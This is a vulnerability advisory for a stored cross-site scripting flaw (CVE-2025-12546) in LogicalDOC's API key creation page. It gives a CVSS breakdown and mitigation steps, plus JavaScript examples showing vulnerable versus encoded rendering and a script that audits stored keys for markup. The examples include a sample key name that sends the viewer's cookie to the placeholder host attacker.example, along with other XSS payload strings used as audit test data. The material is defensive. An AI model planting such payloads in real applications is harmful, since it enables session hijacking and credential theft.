LogicalDOC Community Edition
CVE-2025-12546
LOW
Severity by source: NVD (primary rating and only source for this CVE)
CVSS 4.0 vector (NVD): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description (source: CVE.org)
A vulnerability was determined in LogicalDOC Community Edition up to 9.2.1. This affects an unknown part of the component API Key creation UI. This manipulation causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.
Analysis (AI-generated)
Stored cross-site scripting (XSS) in LogicalDOC Community Edition up to 9.2.1 lets an authenticated user inject script through the API Key creation UI. The payload is persisted and rendered to other users who later open the affected page, where it runs under their session and can read what the page exposes, drive the application on their behalf, or capture credentials. The CVSS vector records the preconditions: PR:L (any low-privileged account can plant the payload) and UI:P (a victim must open the page that renders it). The exploit has been publicly disclosed (E:P), and the vendor did not respond to the disclosure, so no fixed version is confirmed at the time of writing.
Technical Context (AI-generated)
The flaw sits in the API Key creation UI of LogicalDOC Community Edition, a document management system; the advisory names the component but not the exact field. The root cause, as assessed here, is improper handling of user-supplied text in that interface: it is neither validated on input nor encoded on output, so a low-privileged user can submit a key entry containing HTML or JavaScript that is persisted and later executes in the browser of anyone who views the page on which the entry is rendered (CWE-79, Improper Neutralization of Input During Web Page Generation). Because the payload is stored and replayed on every render, this is stored rather than reflected XSS: attacker and victim never need to share a request, and one crafted entry can reach every user, administrators included, who opens the key management page.
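The CWE-79 pattern described above, shown as an added example that is not LogicalDOC's code: a key-listing renderer that concatenates the stored name into markup unchanged, beside the hardened form that validates on input and encodes on output. The record shape (a user-chosen `name` field), the table layout, the `isValidKeyName` allowlist and the `attacker.example` host are all assumptions made for the illustration.

```javascript
// Added example, not LogicalDOC's code: the CWE-79 pattern behind a
// stored XSS in an API-key listing, beside the hardened form.
// Assumptions: the key record has a user-chosen "name" field and the
// list is rendered as an HTML table; field and layout are invented.

// HTML-encode untrusted text for element content or a quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Allowlist validation at creation time: a key label has no business
// containing markup characters. Length limit and charset are assumptions.
function isValidKeyName(name) {
  return typeof name === 'string' && /^[A-Za-z0-9 ._-]{1,64}$/.test(name);
}

// VULNERABLE: the stored name is concatenated into markup unchanged,
// so any user who views the key list executes the author's script.
function renderKeyRowUnsafe(key) {
  return `<tr><td>${key.name}</td><td>${key.created}</td></tr>`;
}

// HARDENED: every untrusted field is encoded at output time. In client
// code the equivalent is assigning to textContent, never innerHTML.
function renderKeyRowSafe(key) {
  return `<tr><td>${escapeHtml(key.name)}</td><td>${escapeHtml(key.created)}</td></tr>`;
}

// Constructed sample payload (attacker.example is a placeholder host):
// a key name that sends the viewer's cookie away when rendered raw.
// Cookie theft only works without HttpOnly; even then the script can
// still drive the application with the viewer's session.
const sampleKey = {
  name: 'ci-bot<script>location="https://attacker.example/?c="+document.cookie</script>',
  created: '2025-01-01',
};

function demo() {
  return {
    accepted: isValidKeyName(sampleKey.name), // false: rejected at creation
    unsafe: renderKeyRowUnsafe(sampleKey),    // raw <script> reaches the viewer
    safe: renderKeyRowSafe(sampleKey),        // rendered as inert text
  };
}

console.log(demo());
```

Input validation and output encoding are independent layers: the allowlist stops the obvious payload at the form, but encoding at render time is what protects users if a value reaches the database by another path (import, API, an older release).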
Remediation (AI-generated)
No vendor-released patch was identified at the time of analysis: the vendor did not respond to the disclosure and no fixed version is known. Until one exists:
(1) Watch for a LogicalDOC release later than 9.2.1 that addresses this issue and upgrade as soon as it appears; if the product remains unmaintained for your risk tolerance, plan a migration to a maintained document management system.
(2) Restrict who can reach the API Key creation UI: limit the ability to create keys to trusted administrators, and add network-level controls (IP allowlisting, WAF rules on the key-creation request path) so that low-privileged accounts cannot submit entries to it.
(3) Deploy a Content-Security-Policy header whose script-src is `'self'` (quoted keyword) with no `'unsafe-inline'`. That blocks both an injected inline script and a script loaded from another origin, which neutralises the usual payloads, but it also blocks the application's own inline scripts, so test the policy in report-only mode before enforcing it.
(4) Audit existing API key records for names containing HTML or script markup, and delete and rotate any created by untrusted users. Do the audit from the database or the REST API rather than by opening the key management page, since that page is where a stored payload would execute.
Organizations that cannot patch should treat (2) as the priority control and monitor application and user-activity logs for key-creation requests containing markup.
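Two of the mitigations above, the key audit in (4) and the CSP check in (3), as an added example that is not LogicalDOC's code. The record shape `{id, name, owner}`, the sample export rows and the `cspAllowsInlineScript` helper are constructed for the illustration; export the real rows from the database or REST API, not from the affected page.

```javascript
// Added example, not LogicalDOC's code: (a) audit exported API-key
// records for names carrying markup, and (b) decide whether a
// Content-Security-Policy header still lets an injected inline script
// run. Record shape and sample rows are constructed.

const MARKUP_CHECKS = [
  { label: 'html-tag',       re: /<\s*\/?\s*[a-z][^>]*>/i },
  { label: 'javascript-url', re: /javascript\s*:/i },
  { label: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { label: 'html-entity',    re: /&(#x?[0-9a-f]+|[a-z]+);/i },
];

// One finding per record whose name matches any check; the first
// matching check is reported as the reason.
function findSuspiciousKeys(records) {
  const findings = [];
  for (const r of records) {
    const hit = MARKUP_CHECKS.find(c => c.re.test(r.name));
    if (hit) findings.push({ id: r.id, owner: r.owner, reason: hit.label });
  }
  return findings;
}

// True when the policy would let an injected inline <script> execute.
// Falls back to default-src when script-src is absent; with neither
// directive the policy restricts nothing. A nonce or hash source in
// the directive makes 'unsafe-inline' ignored (CSP Level 2 and later),
// so the injected script, which has no nonce, is blocked.
function cspAllowsInlineScript(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  const sources = directives['script-src'] || directives['default-src'];
  if (!sources) return true;
  const hasNonceOrHash = sources.some(s => /^'(nonce-|sha(256|384|512)-)/i.test(s));
  if (hasNonceOrHash) return false;
  return sources.some(s => s.toLowerCase() === "'unsafe-inline'");
}

// Constructed sample export: benign labels alongside injected ones.
// "R&D integration" shows that a bare ampersand is not flagged.
const SAMPLE_KEYS = [
  { id: 1, owner: 'alice',   name: 'deploy-pipeline' },
  { id: 2, owner: 'bob',     name: "Bob's laptop" },
  { id: 3, owner: 'mallory', name: 'ci-bot<script>alert(document.cookie)</script>' },
  { id: 4, owner: 'mallory', name: 'x" onmouseover="alert(1)' },
  { id: 5, owner: 'carol',   name: 'R&D integration' },
  { id: 6, owner: 'mallory', name: 'help <a href="javascript:alert(1)">here</a>' },
];

console.log(findSuspiciousKeys(SAMPLE_KEYS));
console.log(cspAllowsInlineScript("default-src 'self'; script-src 'self'"));
console.log(cspAllowsInlineScript("script-src 'self' 'unsafe-inline'"));
```

The audit deliberately errs toward false positives (a quoted attribute break-out such as record 4 contains no `<` at all); every finding still needs a human look before the key is revoked. The CSP check answers one question only, whether inline script is permitted; it does not evaluate whether the policy would break the application, which is why report-only mode comes first.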